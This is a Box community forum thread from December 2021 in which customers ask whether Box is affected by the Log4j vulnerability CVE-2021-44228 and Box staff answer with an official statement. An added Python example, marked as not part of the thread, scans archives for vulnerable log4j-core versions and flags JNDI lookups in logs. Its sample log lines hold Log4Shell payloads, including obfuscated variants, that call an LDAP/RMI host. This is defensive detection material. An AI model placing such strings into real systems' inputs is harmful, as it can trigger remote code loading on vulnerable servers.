
Comments

19 comments

  • Official comment
    France

    Hi Everyone, 

    A quick update regarding this issue:

    "On Dec 9th, 2021, security researchers published a report of a high risk "zero day" vulnerability (CVE-2021-44228) affecting a common software package (Apache Log4J). Box's security and engineering teams immediately began investigating the report and assessing our own systems for impact. At this time, there is no evidence that the Box Service and related systems were successfully exploited.

    While we determined that there were a few vulnerable versions of the package within the Box Service and Infrastructure, Box generally uses a version that wasn't vulnerable. The limited occurrence combined with Box's pre-existing layers of defensive measures maintained for our extensive compliance certifications and industry best practices, prevented the exploitation of any vulnerable versions of Log4J.

    While the instances of the vulnerability were not exploitable and limited, we quickly started and continue to patch services that contained the vulnerable package. As part of our response, we are taking the following additional steps:
    • Extensively reviewed all patched services for malicious behavior prior to patch application and continue to verify our security posture of the patched environment with our typical security exercises, including our Bug Bounty program, external and internal penetration testing, red team activities, etc.
    • Updated all our security devices with relevant Log4j signatures to detect and contain malicious activity related to this exploit where applicable.
    • Continuously monitor and analyze logs after patching is complete.
    • Keeping in touch with industry peers to collect intelligence and mitigation techniques to apply to our environment as needed.
    • Additional internal patching will continue over the next few days as we continue to extensively scan our environment to discover any vulnerable version of the package.
    • We are also in contact with our vendors as a part of our rigorous third-party risk management process to further assess any potential vulnerabilities or impact.
    Protecting our customers' data is our top priority and at this time there is no action that you need to take in regard to the Box platform. If we identify any malicious activity that might impact your data, we will immediately notify and work with your teams. For any specific concerns, please reach out to support.box.com or visit the Box Trust Center to learn more about our approach to security, privacy and compliance."
     
    Thanks again for your inquiries and we appreciate your partnership in this matter.
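The two technical steps in the statement above, scanning an environment for vulnerable copies of the package and adding detection for exploit attempts in logs, written out as an added example. This is not Box's code and not part of the original thread, and it assumes nothing about Box's systems: the archives, version strings and log lines it checks are constructed inline, and the version cut-offs are those for CVE-2021-44228 only (fixed in 2.15.0, or 2.12.2 on the 2.12.x branch), not for the later Log4j CVEs. It looks for `JndiLookup.class` inside jar/war files, including jars nested in a war, and it resolves the common `${lower:j}` / `${::-j}` nesting tricks before matching `${jndi:` so that a trivially obfuscated payload is still caught.

```python
# Added example, not Box's code and not part of this thread: a minimal CVE-2021-44228 scanner
# for jar/war archives plus a JNDI-lookup detector for log lines, run on constructed sample data.
import io
import os
import re
import tempfile
import zipfile

JNDI_LOOKUP = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
POM_PROPS = "META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties"
ARCHIVE_SUFFIXES = (".jar", ".war", ".ear", ".zip")

def is_vulnerable_version(version):
    """CVE-2021-44228 affects log4j-core 2.0-beta9 through 2.14.1; fixed in 2.15.0,
    with 2.12.2 as the backported fix on the Java 7 (2.12.x) branch."""
    m = re.match(r"(\d+)\.(\d+)(?:\.(\d+))?", version or "")  # '2.0-beta9' -> (2, 0, 0)
    v = tuple(int(g or 0) for g in m.groups()) if m else None
    if v is None or v[0] != 2:
        return False
    return v < (2, 12, 2) if v[:2] == (2, 12) else v < (2, 15, 0)

def inspect_archive(data, path):
    """Findings for one archive, recursing into nested jars (fat jars, WEB-INF/lib)."""
    if not zipfile.is_zipfile(io.BytesIO(data)):
        return []
    findings = []
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        names = zf.namelist()
        props = zf.read(POM_PROPS).decode("utf-8", "replace") if POM_PROPS in names else ""
        vm = re.search(r"^version=(.*)$", props, re.M)
        version = vm.group(1).strip() if vm else None
        if JNDI_LOOKUP in names:  # the class the exploit needs; unknown version counts as exposed
            findings.append({"path": path, "version": version,
                             "vulnerable": version is None or is_vulnerable_version(version)})
        for name in names:
            if name.lower().endswith(ARCHIVE_SUFFIXES):
                findings.extend(inspect_archive(zf.read(name), path + "!" + name))
    return findings

def scan_tree(root):
    """Walk a directory tree; return findings for every archive that is exposed."""
    hits = []
    for dirpath, _, files in os.walk(root):
        for full in (os.path.join(dirpath, f) for f in files if f.lower().endswith(ARCHIVE_SUFFIXES)):
            with open(full, "rb") as fh:
                hits += [f for f in inspect_archive(fh.read(), full) if f["vulnerable"]]
    return hits

# Log-side detection: catch ${jndi:...} through the common nested-lookup obfuscations.
_OBFUSCATION = re.compile(r"\$\{(?:lower|upper):([^${}]*)\}|\$\{[^${}]*:-([^${}]*)\}", re.I)
_JNDI = re.compile(r"\$\{\s*jndi\s*:\s*([a-z]+)", re.I)

def deobfuscate(text):
    """Resolve ${lower:x}, ${upper:x} and ${anything:-x} inner lookups until nothing changes."""
    prev = None
    while prev != text:
        prev = text
        text = _OBFUSCATION.sub(lambda m: m.group(2) if m.group(1) is None else m.group(1), text)
    return text

def detect_jndi(line):
    m = _JNDI.search(deobfuscate(line))  # scheme (ldap, rmi, dns, ...) if a lookup is present
    return m.group(1).lower() if m else None

SAMPLE_LOG = [  # constructed access-log lines; the addresses are documentation ranges
    '198.51.100.9 - - [10/Dec/2021:03:14:16 +0000] "GET / HTTP/1.1" 200 "-" "${jndi:ldap://203.0.113.7:1389/a}"',
    '198.51.100.9 - - [10/Dec/2021:03:14:17 +0000] "GET / HTTP/1.1" 200 "-" "${${lower:j}ndi:rmi://203.0.113.7/x}"',
    '198.51.100.9 - - [10/Dec/2021:03:14:18 +0000] "GET / HTTP/1.1" 200 "-" "${${::-j}${::-n}${::-d}${::-i}:${::-l}dap://203.0.113.7/y}"',
    '198.51.100.9 - - [10/Dec/2021:03:14:19 +0000] "GET /?d=${date:yyyy} HTTP/1.1" 200 "-" "curl/7.79"',
]

def scan_log(lines):
    return [(n, detect_jndi(ln)) for n, ln in enumerate(lines, 1) if detect_jndi(ln)]

def _archive_bytes(entries):
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        for name, data in entries.items():
            zf.writestr(name, data)
    return buf.getvalue()

def build_sample_tree(root):
    """Constructed fixtures: a vulnerable jar, a patched jar, and a war nesting a vulnerable jar."""
    def core(version):  # pom.properties plus a stand-in JndiLookup.class
        return {POM_PROPS: "version=%s\n" % version, JNDI_LOOKUP: b"\xca\xfe\xba\xbe"}
    app = os.path.join(root, "app")
    os.makedirs(app, exist_ok=True)
    nested = {"WEB-INF/lib/log4j-core-2.12.1.jar": _archive_bytes(core("2.12.1"))}
    for name, entries in [("log4j-core-2.14.1.jar", core("2.14.1")),
                          ("log4j-core-2.17.1.jar", core("2.17.1")), ("service.war", nested)]:
        with open(os.path.join(app, name), "wb") as fh:
            fh.write(_archive_bytes(entries))

def demo():
    with tempfile.TemporaryDirectory() as tmp:  # throwaway tree of the constructed archives
        build_sample_tree(tmp)
        exposed = sorted(f["path"][len(tmp) + 1:].replace(os.sep, "/") for f in scan_tree(tmp))
    return exposed, scan_log(SAMPLE_LOG)

if __name__ == "__main__":
    print(demo())
```

Run it as a script to see the two exposed archives (the 2.14.1 jar and the 2.12.1 jar nested inside the war, which a filename-only scan would miss) and the three log lines carrying a JNDI lookup; the patched 2.17.1 jar and the harmless `${date:yyyy}` lookup are not reported. For a real sweep, point `scan_tree` at the application and container-image roots, and feed `scan_log` the lines from every input that reaches a logger (headers, user-agent, form fields), since the lookup only fires when the attacker-controlled string is logged.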
  • Kyle Staley

    I am also looking for an official response from Box on this vulnerability. 

    Is the Box platform affected by CVE-2021-44228?

    1
  • Jim Spohnholtz

    We are also looking for confirmation and an official response.

    Is the Box platform affected by CVE-2021-44228?

    0
  • Jim Blahnik

    We are also looking for confirmation and an official response.

    Is the Box platform affected by CVE-2021-44228?

    0
  • Carissa Bourdon

    I am also interested in a response from Box.com, we need to confirm that Box services are NOT vulnerable to the Log4j vulnerability (log4shell). 

    0
  • Nico Spitsbaard

    We are also looking for confirmation and an official response.

    Is the Box platform affected by CVE-2021-44228?

    0
  • Robert Fernandes

    Hello, Box needs to come out with an official statement regarding the log4j vulnerability. Most major vendors have been very quick to respond to this, and I have not seen anything from Box yet. Is Box affected by this vulnerability?

    0
  • Derek Harbin

    Agree to the above statement.

    0
  • Gareth Sweeney

    Agree BOX need to make a statement on this.

    0
  • Ian Roberts

    I totally agree... Would be nice to know if Box can attest that they have implemented the "Apache released Log4j version 2.15.0 security update to address this vulnerability." https://www.cisa.gov/uscert/apache-log4j-vulnerability-guidance  

    0
  • Linda Ness

    Will BOX respond so that we know whether we are impacted by the Apache log4j vulnerability CVE-2021-44228, please?

    0
  • Patrick Chartrand

    We too are looking for an official response from Box on this, as it's part of our security review. Has anyone seen, or does anyone know of, an official response to this yet? I can't seem to find one.

    0
  • France

    Hi Everyone, 

    Welcome to the Box Community and thank you for your posts!

    We have been actively investigating the impact of Log4J on Box, and we have found no evidence of successful exploitation. We will share additional details soon. We're taking this review seriously and our teams are working to provide updates as we have them.

    You may also find Box's official statement regarding this matter on this blog post.

    Many thanks for your participation in the forum and let us know how else we can help!

    0
  • Charles L curran

    Would also like an update on this, and the link that was just posted gives me a 404.

    0
  • France

    Hi Charles, 

    I've fixed the link for you; can you try accessing it again?

    0
  • evanoost

    Per our Security Scans, it does not seem the regular Box Drive application is vulnerable. However the Box DICOM Proxy seems to be reliant on log4j.

    0
  • Erich Stephens

    Will Box be responding to this comment of 15 days ago, regarding the Box DICOM Proxy seeming to be reliant on log4j?

    0
  • John Blatt

    Every other vendor I work with has issued a pretty detailed list of whether their products use Log4j and, if they do, where they are in patching or monitoring. Not sure how much longer Box's thin statement will be acceptable to clients.

    0
  • David Saelee

    Any update on this? I need confirmation of whether Box Drive is affected by log4j.

    0

Post is closed for comments.